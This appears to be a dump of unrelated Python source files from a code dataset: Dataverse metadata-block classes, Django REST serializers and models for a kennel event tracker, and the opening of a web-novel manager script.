description='The unit in which the amount is measured.',
multiple=False,
typeClass='primitive',
typeName='engMetaCompUnit',
)
force_field: Optional[str] = Field(
None,
description='Name of the force field belonging to this component (detailed information about the force field should be given under Force Field Parameters).',
multiple=False,
typeClass='primitive',
typeName='engMetaCompForcefield',
)
class ControlledVariables(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarName',
)
symbol: Optional[str] = Field(
None,
description='The symbol used to describe this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarSymbol',
)
unit: Optional[str] = Field(
None,
description='The unit or scale of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarUnit',
)
value: Optional[float] = Field(
None,
description='The (single) value of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarValue',
)
minimum_value: Optional[float] = Field(
None,
description='The minimum value of this variable (use for ranges)',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarValueFrom',
)
maximum_value: Optional[float] = Field(
None,
description='The maximum value of this variable (use for ranges)',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarValueTo',
)
textual_value: Optional[str] = Field(
None,
description='The value of this controlled variable (for non numerical values).',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarTextValue',
)
class ForceFieldParameters(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of the parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldParName',
)
symbol: Optional[str] = Field(
None,
description='The symbol used to describe this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldParSymbol',
)
unit: Optional[str] = Field(
None,
description='The unit or scale of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldParUnit',
)
value: Optional[float] = Field(
None,
description='The value of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldParValue',
)
class Flows(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of the flow.',
multiple=False,
typeClass='primitive',
typeName='engMetaFlowsName',
)
components: Optional[str] = Field(
None,
description='List of system component names this flow belongs to.',
multiple=False,
typeClass='primitive',
typeName='engMetaFlowsComp',
)
shape: Optional[str] = Field(
None,
description='Shape of the flow.',
multiple=False,
typeClass='primitive',
typeName='engMetaFlowsShape',
)
size: Optional[float] = Field(
None,
description='Size of the flow.',
multiple=False,
typeClass='primitive',
typeName='engMetaFlowsSize',
)
position: Optional[str] = Field(
None,
description='The position of the flow.',
multiple=False,
typeClass='primitive',
typeName='engMetaFlowsPosition',
)
class ForceField(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of the force field.',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldName',
)
parameters: Optional[str] = Field(
None,
description='List of all parameter names relevant for this force field (detailed information about parameters should be given under Force Field Parameters entry).',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldPars',
)
class SpatialResolution(DataverseBase):
number_of_cells: Optional[int] = Field(
None,
description='The number of 2D spatial cells.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterCountCells',
)
number_of_blocks: Optional[int] = Field(
None,
description='The number of 3D spatial blocks.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterCountBlocks',
)
number_of_points_x: Optional[int] = Field(
None,
description='The number of points in x-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterCountX',
)
number_of_points_y: Optional[int] = Field(
None,
description='The number of points in y-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterCountY',
)
number_of_points_z: Optional[int] = Field(
None,
description='The number of points in z-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterCountZ',
)
interval_x: Optional[float] = Field(
None,
description='The distance between the points in x-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterIntervalX',
)
interval_y: Optional[float] = Field(
None,
description='The distance between the points in y-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterIntervalY',
)
interval_z: Optional[float] = Field(
None,
description='The distance between the points in z-direction.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterIntervalZ',
)
unit: Optional[str] = Field(
None,
description='The unit of the grid.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterUnit',
)
scaling_formular: Optional[str] = Field(
None,
description='If the grid is not equidistant, the distance between points can be specified via a formular.',
multiple=False,
typeClass='primitive',
typeName='engMetaGitterScalingFormular',
)
class BoundaryParameters(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of the parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondParName',
)
symbol: Optional[str] = Field(
None,
description='The symbol used to describe this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondParSymbol',
)
unit: Optional[str] = Field(
None,
description='The unit or scale of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondParUnit',
)
value: Optional[float] = Field(
None,
description='The value of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondParValue',
)
class SystemPhases(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of a phase.',
multiple=False,
typeClass='primitive',
typeName='engMetaPhaseName',
)
components: Optional[str] = Field(
None,
description='List of all component names for this phase (detailed information about components should be given under System Components).',
multiple=False,
typeClass='primitive',
typeName='engMetaPhaseComps',
)
class TemporalResolution(DataverseBase):
points: Optional[str] = Field(
None,
description='List of time points that describe the temporal resolution (if it can not be specified otherwise).',
multiple=False,
typeClass='primitive',
typeName='engMetaTempPoints',
)
number_of_time_steps: Optional[int] = Field(
None,
description='The number of time points (with equidistant distance).',
multiple=False,
typeClass='primitive',
typeName='engMetaTempCountPoints',
)
interval: Optional[float] = Field(
None,
description='Distance between two time points.',
multiple=False,
typeClass='primitive',
typeName='engMetaTempInterval',
)
unit: Optional[str] = Field(
None,
description='The unit of the temporal resolution.',
multiple=False,
typeClass='primitive',
typeName='engMetaTempUnit',
)
class BoundaryConditions(DataverseBase):
flows: Optional[str] = Field(
None,
description='List of in- and outflows describing this boundary condition (detailed information about flows should be given under Flows).',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondFlows',
)
parameters: Optional[str] = Field(
None,
description='List of all parameter names relevant for this boundary condition (detailed information about parameters should be given under Boundary Parameters.',
multiple=False,
typeClass='primitive',
typeName='engMetaBoundCondPars',
)
class EngMeta(DataverseBase):
system_parameters: List[SystemParameters] = Field(
default_factory=list,
description='Parameters of the observed system.',
multiple=True,
typeClass='compound',
typeName='engMetaSystemPar',
)
measured_variables: List[MeasuredVariables] = Field(
default_factory=list,
description='Specification of captured (measured / simulated / surveyed / dependent) variables.',
multiple=True,
typeClass='compound',
typeName='engMetaMeasuredVar',
)
system_or_phase_components: List[SystemOrPhaseComponents] = Field(
default_factory=list,
description='Specification of a component of the object of research / observed system',
multiple=True,
typeClass='compound',
typeName='engMetaComp',
)
controlled_variables: List[ControlledVariables] = Field(
default_factory=list,
description='Specification of controlled (observed / independent) variables.',
multiple=True,
typeClass='compound',
typeName='engMetaControlledVar',
)
force_field_parameters: List[ForceFieldParameters] = Field(
default_factory=list,
description='Specification of a force field parameter.',
multiple=True,
typeClass='compound',
typeName='engMetaForcefieldPar',
)
flows: List[Flows] = Field(
default_factory=list,
description='Information about in- and outflows relevant for boundary conditions.',
multiple=True,
typeClass='compound',
typeName='engMetaFlows',
)
force_field: List[ForceField] = Field(
default_factory=list,
description='Specification of a force field',
multiple=True,
typeClass='compound',
typeName='engMetaForcefield',
)
spatial_resolution: List[SpatialResolution] = Field(
default_factory=list,
description='Specification of the spatial grid of the observation.',
multiple=True,
typeClass='compound',
typeName='engMetaGitter',
)
boundary_parameters: List[BoundaryParameters] = Field(
default_factory=list,
description='Parameters relevant for boundary conditions.',
multiple=True,
typeClass='compound',
typeName='engMetaBoundCondPar',
)
system_phases: List[SystemPhases] = Field(
default_factory=list,
description='Phases of the observed system.',
multiple=True,
typeClass='compound',
typeName='engMetaPhase',
)
temporal_resolution: List[TemporalResolution] = Field(
default_factory=list,
description='Temporal resolution of the observation. Can be defined either through a number of time steps with a definition of the intervals (with unit) between the timesteps (equidistant time steps) or a series of time steps together with the unit.',
multiple=True,
typeClass='compound',
typeName='engMetaTemp',
)
data_generation: Optional[Union[List, DataGeneration]] = Field(
None,
description='Approach to data generation',
multiple=True,
typeClass='controlledVocabulary',
typeName='engMetaMode',
)
boundary_conditions: List[BoundaryConditions] = Field(
default_factory=list,
description='Definition of boundaries of the observed system.',
multiple=True,
typeClass='compound',
typeName='engMetaBoundCond',
)
_metadatablock_name: Optional[str] = 'engMeta'
def add_boundary_conditions(
self,
flows: Optional[str] = None,
parameters: Optional[str] = None,
):
"""Function used to add an instance of BoundaryConditions to the metadatablock.
Args:
flows (string): List of in- and outflows describing this boundary condition (detailed information about flows should be given under Flows).
parameters (string): List of all parameter names relevant for this boundary condition (detailed information about parameters should be given under Boundary Parameters.
"""
self.boundary_conditions.append(
BoundaryConditions(
flows=flows, parameters=parameters
)
)
def add_boundary_parameters(
self,
name: Optional[str] = None,
symbol: Optional[str] = None,
unit: Optional[str] = None,
value: Optional[float] = None,
):
"""Function used to add an instance of BoundaryParameters to the metadatablock.
Args:
name (string): Name of the parameter.
symbol (string): The symbol used to describe this parameter.
unit (string): The unit or scale of this parameter.
value (number): The value of this parameter.
"""
self.boundary_parameters.append(
BoundaryParameters(
name=name, symbol=symbol, unit=unit, value=value
)
)
def add_controlled_variables(
self,
name: Optional[str] = None,
symbol: Optional[str] = None,
unit: Optional[str] = None,
value: Optional[float] = None,
minimum_value: Optional[float] = None,
maximum_value: Optional[float] = None,
textual_value: Optional[str] = None,
):
"""Function used to add an instance of ControlledVariables to the metadatablock.
Args:
name (string): Name of this variable.
symbol (string): The symbol used to describe this variable.
unit (string): The unit or scale of this variable.
value (number): The (single) value of this variable.
minimum_value (number): The minimum value of this variable (use for ranges)
maximum_value (number): The maximum value of this variable (use for ranges)
textual_value (string): The value of this controlled variable (for non numerical values).
"""
self.controlled_variables.append(
ControlledVariables(
name=name, symbol=symbol, unit=unit, value=value, minimum_value=minimum_value, maximum_value=maximum_value, textual_value=textual_value
)
)
def add_flows(
self,
name: Optional[str] = None,
components: Optional[str] = None,
shape: Optional[str] = None,
size: Optional[float] = None,
position: Optional[str] = None,
):
"""Function used to add an instance of Flows to the metadatablock.
Args:
name (string): Name of the flow.
components (string): List of system component names this flow belongs to.
shape (string): Shape of the flow.
size (number): Size of the flow.
position (string): The position of the flow.
"""
self.flows.append(
Flows(
name=name, components=components, shape=shape, size=size, position=position
)
)
def add_force_field(
self,
name: Optional[str] = None,
parameters: Optional[str] = None,
):
"""Function used to add an instance of ForceField to the metadatablock.
Args:
name (string): Name of the force field.
parameters (string): List of all parameter names relevant for this force field (detailed information about parameters should be given under Force Field Parameters entry).
"""
self.force_field.append(
ForceField(
name=name, parameters=parameters
)
)
def add_force_field_parameters(
self,
name: Optional[str] = None,
symbol: Optional[str] = None,
unit: Optional[str] = None,
value: Optional[float] = None,
):
"""Function used to add an instance of ForceFieldParameters to the metadatablock.
Args:
name (string): Name of the parameter.
symbol (string): The symbol used to describe this parameter.
unit (string): The unit or scale of this parameter.
value (number): The value of this parameter.
"""
self.force_field_parameters.append(
ForceFieldParameters(
name=name, symbol=symbol, unit=unit, value=value
)
)
def add_measured_variables(
self,
name: Optional[str] = None,
symbol: Optional[str] = None,
unit: Optional[str] = None,
error: Optional[float] = None,
error_description: Optional[str] = None,
minimum_value: Optional[float] = None,
maximum_value: Optional[float] = None,
textual_value: Optional[str] = None,
):
"""Function used to add an instance of MeasuredVariables to the metadatablock.
Args:
name (string): Name of this variable.
symbol (string): The symbol used to describe this variable.
unit (string): The unit or scale of this variable.
error (number): A value for the uncertainty of this variable.
error_description (string): The type the error is measured (e.g. standard deviation, percentage, …)
minimum_value (number): The minimum value of this variable (use for ranges)
maximum_value (number): The maximum value of this variable (use for ranges)
textual_value (string): The value of this measured variable (for non numerical values).
"""
self.measured_variables.append(
MeasuredVariables(
name=name, symbol=symbol, unit=unit, error=error, error_description=error_description, minimum_value=minimum_value, maximum_value=maximum_value, textual_value=textual_value
)
)
def add_spatial_resolution(
self,
number_of_cells: Optional[int] = None,
number_of_blocks: Optional[int] = None,
number_of_points_x: Optional[int] = None,
number_of_points_y: Optional[int] = None,
number_of_points_z: Optional[int] = None,
interval_x: Optional[float] = None,
interval_y: Optional[float] = None,
interval_z: Optional[float] = None,
unit: Optional[str] = None,
scaling_formular: Optional[str] = None,
):
"""Function used to add an instance of SpatialResolution to the metadatablock.
Args:
number_of_cells (integer): The number of 2D spatial cells.
number_of_blocks (integer): The number of 3D spatial blocks.
number_of_points_x (integer): The number of points in x-direction.
number_of_points_y (integer): The number of points in y-direction.
number_of_points_z (integer): The number of points in z-direction.
interval_x (number): The distance between the points in x-direction.
interval_y (number): The distance between the points in y-direction.
interval_z (number): The distance between the points in z-direction.
unit (string): The unit of the grid.
scaling_formular (string): If the grid is not equidistant, the distance between points can be specified via a formular.
"""
self.spatial_resolution.append(
SpatialResolution(
number_of_cells=number_of_cells, number_of_blocks=number_of_blocks, number_of_points_x=number_of_points_x, number_of_points_y=number_of_points_y, number_of_points_z=number_of_points_z, interval_x=interval_x, interval_y=interval_y, interval_z=interval_z, unit=unit, scaling_formular=scaling_formular
)
)
def add_system_or_phase_components(
self,
id: Optional[int] = None,
name: Optional[str] = None,
description: Optional[str] = None,
inchicode: Optional[str] = None,
smilescode: Optional[str] = None,
iupac_name: Optional[str] = None,
quantity: Optional[str] = None,
unit: Optional[str] = None,
force_field: Optional[str] = None,
):
"""Function used to add an instance of SystemOrPhaseComponents to the metadatablock.
Args:
id (integer): Unique number that can be referred to in the metadata. Use if Name is not unique.
name (string): Name of this component.
description (string): Description of the component.
inchicode (string): The IUPAC International Chemical Identifier
smilescode (string): Simplified Molecular Input Line Entry Specification
iupac_name (string): Chemical nomenclature created and developed by the International Union of Pure and Applied Chemistry (IUPAC)
quantity (string): The amount of this component.
unit (string): The unit in which the amount is measured.
force_field (string): Name of the force field belonging to this component (detailed information about the force field should be given under Force Field Parameters).
"""
self.system_or_phase_components.append(
SystemOrPhaseComponents(
id=id, name=name, description=description, inchicode=inchicode, smilescode=smilescode, iupac_name=iupac_name, quantity=quantity, unit=unit, force_field=force_field
)
)
def add_system_parameters(
self,
name: Optional[str] = None,
symbol: Optional[str] = None,
unit: Optional[str] = None,
value: Optional[float] = None,
textual_value: Optional[str] = None,
):
"""Function used to add an instance of SystemParameters to the metadatablock.
Args:
name (string): Name of the parameter.
symbol (string): The symbol used to describe this parameter.
unit (string): The unit or scale of this parameter.
value (number): The (numerical) value of this parameter.
textual_value (string): The value of this system parameter (for non numerical values).
"""
self.system_parameters.append(
SystemParameters(
name=name, symbol=symbol, unit=unit, value=value, textual_value=textual_value
)
)
def add_system_phases(
self,
name: Optional[str] = None,
components: Optional[str] = None,
):
"""Function used to add an instance of SystemPhases to the metadatablock.
Args:
name (string): Name of a phase.
components (string): List of all component names for this phase (detailed information about components should be given under System Components).
"""
self.system_phases.append(
SystemPhases(
name=name, components=components
)
)
def add_temporal_resolution(
self,
points: Optional[str] = None,
number_of_time_steps: Optional[int] = None,
interval: Optional[float] = None,
unit: Optional[str] = None,
):
"""Function used to add an instance of TemporalResolution to the metadatablock.
Args:
points (string): List of time points that describe the temporal resolution (if it can not be specified otherwise).
number_of_time_steps (integer): The number of time points (with equidistant distance).
interval (number): Distance between two time points.
unit (string): The unit of the temporal resolution.
"""
self.temporal_resolution.append(
TemporalResolution(
points=points, number_of_time_steps=number_of_time_steps, interval=interval, unit=unit
)
)
```
#### File: pyDaRUS/metadatablocks/socialscience.py
```python
from __future__ import annotations
from typing import List, Optional
from easyDataverse.core import DataverseBase
from pydantic import Field
class Notes(DataverseBase):
type: Optional[str] = Field(
None,
description='Type of note.',
multiple=False,
typeClass='primitive',
typeName='socialScienceNotesType',
)
subject: Optional[str] = Field(
None,
description='Note subject.',
multiple=False,
typeClass='primitive',
typeName='socialScienceNotesSubject',
)
text: Optional[str] = Field(
None,
description='Text for this note.',
multiple=False,
typeClass='primitive',
typeName='socialScienceNotesText',
)
class TargetSampleSize(DataverseBase):
actual: Optional[int] = Field(
None,
description='Actual sample size.',
multiple=False,
typeClass='primitive',
typeName='targetSampleActualSize',
)
formula: Optional[str] = Field(
None,
description='Formula used to determine target sample size.',
multiple=False,
typeClass='primitive',
typeName='targetSampleSizeFormula',
)
class Socialscience(DataverseBase):
notes: List[Notes] = Field(
default_factory=list,
description='General notes about this Dataset.',
multiple=False,
typeClass='compound',
typeName='socialScienceNotes',
)
unit_of_analysis: Optional[List] = Field(
None,
description="Basic unit of analysis or observation that this Dataset describes, such as individuals, families/households, groups, institutions/organizations, administrative units, and more. For information about the DDI's controlled vocabulary for this element, please refer to the DDI web page at http://www.ddialliance.org/controlled-vocabularies.",
multiple=True,
typeClass='primitive',
typeName='unitOfAnalysis',
)
universe: Optional[List] = Field(
None,
description='Description of the population covered by the data in the file; the group of people or other elements that are the object of the study and to which the study results refer. Age, nationality, and residence commonly help to delineate a given universe, but any number of other factors may be used, such as age limits, sex, marital status, race, ethnic group, nationality, income, veteran status, criminal convictions, and more. The universe may consist of elements other than persons, such as housing units, court cases, deaths, countries, and so on. In general, it should be possible to tell from the description of the universe whether a given individual or element is a member of the population under study. Also known as the universe of interest, population of interest, and target population.',
multiple=True,
typeClass='primitive',
typeName='universe',
)
time_method: Optional[str] = Field(
None,
description='The time method or time dimension of the data collection, such as panel, cross-sectional, trend, time- series, or other.',
multiple=False,
typeClass='primitive',
typeName='timeMethod',
)
data_collector: Optional[str] = Field(
None,
description='Individual, agency or organization responsible for administering the questionnaire or interview or compiling the data.',
multiple=False,
typeClass='primitive',
typeName='dataCollector',
)
collector_training: Optional[str] = Field(
None,
description='Type of training provided to the data collector',
multiple=False,
typeClass='primitive',
typeName='collectorTraining',
)
frequency: Optional[str] = Field(
None,
description='If the data collected includes more than one point in time, indicate the frequency with which the data was collected; that is, monthly, quarterly, or other.',
multiple=False,
typeClass='primitive',
typeName='frequencyOfDataCollection',
)
sampling_procedure: Optional[str] = Field(
None,
description='Type of sample and sample design used to select the survey respondents to represent the population. May include reference to the target sample size and the sampling fraction.',
multiple=False,
typeClass='primitive',
typeName='samplingProcedure',
)
major_deviations_for_sample_design: Optional[str] = Field(
None,
description='Show correspondence as well as discrepancies between the sampled units (obtained) and available statistics for the population (age, sex-ratio, marital status, etc.) as a whole.',
multiple=False,
typeClass='primitive',
typeName='deviationsFromSampleDesign',
)
collection_mode: Optional[List] = Field(
None,
description='Method used to collect the data; instrumentation characteristics (e.g., telephone interview, mail questionnaire, or other).',
multiple=True,
typeClass='primitive',
typeName='collectionMode',
)
type_of_research_instrument: Optional[str] = Field(
None,
description='Type of data collection instrument used. Structured indicates an instrument in which all respondents are asked the same questions/tests, possibly with precoded answers. If a small portion of such a questionnaire includes open-ended questions, provide appropriate comments. Semi-structured indicates that the research instrument contains mainly open-ended questions. Unstructured indicates that in-depth interviews were conducted.',
multiple=False,
typeClass='primitive',
typeName='researchInstrument',
)
characteristics_of_data_collection_situation: Optional[str] = Field(
None,
description='Description of noteworthy aspects of the data collection situation. Includes information on factors such as cooperativeness of respondents, duration of interviews, number of call backs, or similar.',
multiple=False,
typeClass='primitive',
typeName='dataCollectionSituation',
)
actions_to_minimize_losses: Optional[str] = Field(
None,
description='Summary of actions taken to minimize data loss. Include information on actions such as follow-up visits, supervisory checks, historical matching, estimation, and so on.',
multiple=False,
typeClass='primitive',
typeName='actionsToMinimizeLoss',
)
control_operations: Optional[str] = Field(
None,
description='Control OperationsMethods to facilitate data control performed by the primary investigator or by the data archive.',
multiple=False,
typeClass='primitive',
typeName='controlOperations',
)
weighting: Optional[str] = Field(
None,
description='The use of sampling procedures might make it necessary to apply weights to produce accurate statistical results. Describes the criteria for using weights in analysis of a collection. If a weighting formula or coefficient was developed, the formula is provided, its elements are defined, and it is indicated how the formula was applied to the data.',
multiple=False,
typeClass='primitive',
typeName='weighting',
)
cleaning_operations: Optional[str] = Field(
None,
description='Methods used to clean the data collection, such as consistency checking, wildcode checking, or other.',
multiple=False,
typeClass='primitive',
typeName='cleaningOperations',
)
study_level_error_notes: Optional[str] = Field(
None,
description='Note element used for any information annotating or clarifying the methodology and processing of the study. ',
multiple=False,
typeClass='primitive',
typeName='datasetLevelErrorNotes',
)
response_rate: Optional[str] = Field(
None,
description='Percentage of sample members who provided information.',
multiple=False,
typeClass='primitive',
typeName='responseRate',
)
estimates_of_sampling_error: Optional[str] = Field(
None,
description='Measure of how precisely one can estimate a population value from a given sample.',
multiple=False,
typeClass='primitive',
typeName='samplingErrorEstimates',
)
other_forms_of_data_appraisal: Optional[str] = Field(
None,
description='Other issues pertaining to the data appraisal. Describe issues such as response variance, nonresponse rate and testing for bias, interviewer and response bias, confidence levels, question bias, or similar.',
multiple=False,
typeClass='primitive',
typeName='otherDataAppraisal',
)
target_sample_size: List[TargetSampleSize] = Field(
default_factory=list,
description='Specific information regarding the target sample size, actual sample size, and the formula used to determine this.',
multiple=False,
typeClass='compound',
typeName='targetSampleSize',
)
_metadatablock_name: Optional[str] = 'socialscience'
def add_notes(
self,
type: Optional[str] = None,
subject: Optional[str] = None,
text: Optional[str] = None,
):
"""Function used to add an instance of Notes to the metadatablock.
Args:
type (string): Type of note.
subject (string): Note subject.
text (string): Text for this note.
"""
self.notes.append(
Notes(
type=type, subject=subject, text=text
)
)
def add_target_sample_size(
self,
actual: Optional[int] = None,
formula: Optional[str] = None,
):
"""Function used to add an instance of TargetSampleSize to the metadatablock.
Args:
actual (integer): Actual sample size.
formula (string): Formula used to determine target sample size.
"""
self.target_sample_size.append(
TargetSampleSize(
actual=actual, formula=formula
)
)
``` |
{
"source": "jR1P621/packtrack",
"score": 3
} |
#### File: api/serializers/common.py
```python
from rest_framework import serializers
from typing import List
class NestedDynamicFieldsModelSerializer(serializers.ModelSerializer):
'''
Allows dynamic control over the depth and information presented in nested serializers.
'''
def __init__(self, *args, **kwargs):
def parse_nested_fields(fields: List[str]) -> dict:
'''
Parses the `fields` parameter to get
'''
field_object = {"fields": []}
for f in fields:
obj = field_object
# get nested serializer fields
nested_fields = f.split("__")
for v in nested_fields:
# add this objects field
if v not in obj["fields"]:
obj["fields"].append(v)
# add nested object's field
if nested_fields.index(v) < len(nested_fields) - 1:
obj[v] = obj.get(v, {"fields": []})
obj = obj[v]
return field_object
def select_nested_fields(serializer, fields):
'''
Wrapper to retrieve data from serializer fields or nested serializer fields
'''
for k in fields:
if k == "fields":
fields_to_include(serializer, fields[k])
else:
select_nested_fields(serializer.fields[k], fields[k])
def fields_to_include(serializer, fields):
'''
Drop any fields that are not specified in the `fields` argument.
'''
allowed = set(fields)
if isinstance(serializer, serializers.ListSerializer):
existing = set(serializer.child.fields.keys())
for field_name in existing - allowed:
serializer.child.fields.pop(field_name)
else:
existing = set(serializer.fields.keys())
for field_name in existing - allowed:
serializer.fields.pop(field_name)
# Don't pass the `fields` arg up to the superclass
fields = kwargs.pop('fields', None)
super().__init__(*args, **kwargs)
if fields is not None:
fields = parse_nested_fields(fields)
# Drop any fields that are not specified in the `fields` argument.
select_nested_fields(self, fields)
```
#### File: packtrack/core/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save, pre_delete
from django.dispatch import receiver
import datetime
from . import settings
def default_invite_expiration():
return datetime.date.today() + datetime.timedelta(
days=settings.DEFAULT_INVITE_EXPIRATION_DAYS)
class InviteCode(models.Model):
'''
An invite code needed for new users to register.
'''
creator = models.ForeignKey(User, on_delete=models.CASCADE)
code = models.CharField(max_length=8, unique=True)
expiration = models.DateField(null=True, blank=True)
receiver = models.OneToOneField(User,
on_delete=models.CASCADE,
null=True,
blank=True,
related_name='invite_code')
@receiver(post_save, sender=InviteCode)
def set_expiration(sender, instance, created, **kwargs) -> None:
'''
Sets the expiration date for newly created InviteCodes.
Removes expiration for used codes
'''
if created:
instance.expiration = default_invite_expiration()
elif instance.receiver and instance.expiration is not None:
instance.expiration = None
else:
return
instance.save()
```
#### File: events/api/serializers.py
```python
from django.db.utils import IntegrityError
from rest_framework import serializers, exceptions
from django.utils.translation import gettext_lazy as _
from .. import models
from core.api.serializers.serializers import UserSerializer
from core.api.serializers.common import NestedDynamicFieldsModelSerializer
from kennels.api.serializers import KennelSerializer
class EventSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
'''
'''
host = KennelSerializer(fields=['url,', 'name', 'acronym'], read_only=True)
kennels = KennelSerializer(fields=['url', 'name', 'acronym'],
many=True,
read_only=True)
attendance = serializers.SerializerMethodField()
class Meta:
model = models.Event
fields = ['url', 'id', 'name', 'date', 'host', 'attendance', 'kennels']
read_only_fields = [
'url', 'id', 'date', 'host', 'attendance', 'kennels'
]
def get_attendance(self, instance):
# get kennels where user is admin
return AttendSerializer(instance.attendance.order_by('user'),
fields=[
'url', 'is_hare', 'unclaimed_name',
'user__url', 'user__username',
'user__profile__hash_name'
],
many=True,
context=self.context).data
class EventCreateSerializer(serializers.HyperlinkedModelSerializer):
'''
Serializer for Event creation.
Provides proper fields and kennel-level permissions
'''
date = serializers.DateField()
class Meta:
model = models.Event
fields = ['name', 'date', 'host']
def create(self, validated_data):
if self.context['request'].user in validated_data[
'host'].get_kennel_admins():
return super().create(validated_data)
raise exceptions.PermissionDenied
class LongevitySerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
kennel = KennelSerializer(fields=['url', 'name', 'acronym'])
event = EventSerializer(
fields=['url', 'name', 'host__url', 'host__name', 'host__acronym'])
class Meta:
model = models.Longevity
fields = ['url', 'kennel', 'event']
read_only_fields = ['url', 'kennel', 'event']
class AttendSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
user = UserSerializer(fields=['url', 'username', 'profile__hash_name'],
read_only=True)
longevity_records = serializers.SerializerMethodField()
event = EventSerializer(fields=[
'url', 'id', 'name', 'date', 'host__url', 'host__name', 'host__acronym'
])
claimants = serializers.SerializerMethodField()
class Meta:
model = models.Attend
fields = [
'url', 'event', 'user', 'unclaimed_name', 'is_hare',
'longevity_records', 'claimants'
]
read_only_fields = [
'event', 'user', 'unclaimed_name', 'is_hare', 'longevity_records',
'claimants'
]
def get_longevity_records(self, instance):
return LongevityRecordSerializer(instance=instance.longevity_records,
context=self.context,
fields=[
'url', 'longevity',
'longevity__kennel__url',
'longevity__kennel__name',
'longevity__kennel__acronym'
],
many=True).data
def get_claimants(self, instance):
return UserSerializer(instance=instance.claimants,
context=self.context,
fields=[
'url',
'username',
'profile__hash_name',
],
many=True).data
class AttendCreateSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
'''
Serializer for Attend creation.
Provides proper fields and kennel-level permissions
'''
class Meta:
model = models.Attend
fields = ['url', 'event', 'user', 'unclaimed_name', 'is_hare']
def create(self, validated_data):
if self.context['request'].user in validated_data[
'event'].host.get_kennel_admins():
return super().create(validated_data)
raise exceptions.PermissionDenied
class AttendModifyClaimedSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
'''
Serializer for claimed Attend modification.
Restricts writable fields
'''
class Meta:
model = models.Attend
fields = ['url', 'event', 'user', 'is_hare']
read_only_fields = ['event', 'user']
class AttendModifyUnclaimedSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
'''
Serializer for claimed Attend modification.
'''
class Meta:
model = models.Attend
fields = ['url', 'event', 'user', 'unclaimed_name', 'is_hare']
read_only_fields = ['event']
class LongevityRecordSerializer(NestedDynamicFieldsModelSerializer,
serializers.HyperlinkedModelSerializer):
longevity = LongevitySerializer(fields=[
'event__url', 'event__name', 'event__host__url', 'event__host__name',
'event__host__acronym', 'kennel__url', 'kennel__name',
'kennel__acronym'
],
read_only=True)
attend = AttendSerializer(fields=[
'user__url', 'user__username', 'user__profile__hash_name',
'unclaimed_name'
],
read_only=True)
class Meta:
model = models.LongevityRecord
fields = ['url', 'longevity', 'is_longevity', 'attend']
class AttendClaimSerializer(serializers.HyperlinkedModelSerializer):
attend = AttendSerializer(fields=[
'url', 'event__url', 'event__name', 'event__date', 'event__host__url',
'event__host__name', 'event__host__acronym', 'unclaimed_name'
])
class Meta:
model = models.AttendClaim
fields = ['url', 'attend', 'claimant']
read_only_fields = ['claimant']
class AttendClaimCreateSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = models.AttendClaim
fields = ['attend', 'claimant']
read_only_fields = ['claimant']
def create(self, validated_data):
# if the attend is already claimed
if validated_data['attend'].user:
raise IntegrityError
# if the claimant already has an attend for this event
if models.Attend.objects.filter(
user=self.context['request'].user,
event=validated_data['attend'].event).count() > 0:
raise IntegrityError
return super().create(validated_data)
``` |
{
"source": "jr2nbv/webnovel-manager",
"score": 2
} |
#### File: jr2nbv/webnovel-manager/webnovel.py
```python
import sys
import re
import json
import requests
import os
import io
import pprint # for debug
import hashlib
from enum import Enum
from bs4 import BeautifulSoup, NavigableString, Tag
import xml.sax.saxutils
import shlex
import subprocess
import shutil
from jinja2 import Environment, FileSystemLoader
import pprint
from collections import deque
class Publishers(Enum):
narou = dict(
name = u'小説家になろう',
url = u'http://ncode.syosetu.com/',
api = u'http://api.syosetu.com/novelapi/api/',
ncode_pattern = r'n\d{4}\w{1,2}',
meta_list_valid_length = 2
)
hameln = dict(
name = u'ハーメルン',
url = u'https://novel.syosetu.org/',
ncode_pattern = r'',
meta_list_valid_length = 2
)
kakuyomu = dict(
name = u'カクヨム',
url = u'https://kakuyomu.jp/',
ncode_pattern = r'\d{11,}',
meta_list_valid_length = 2
)
def url(self):
return self.value['url']
def api(self):
return self.value['api']
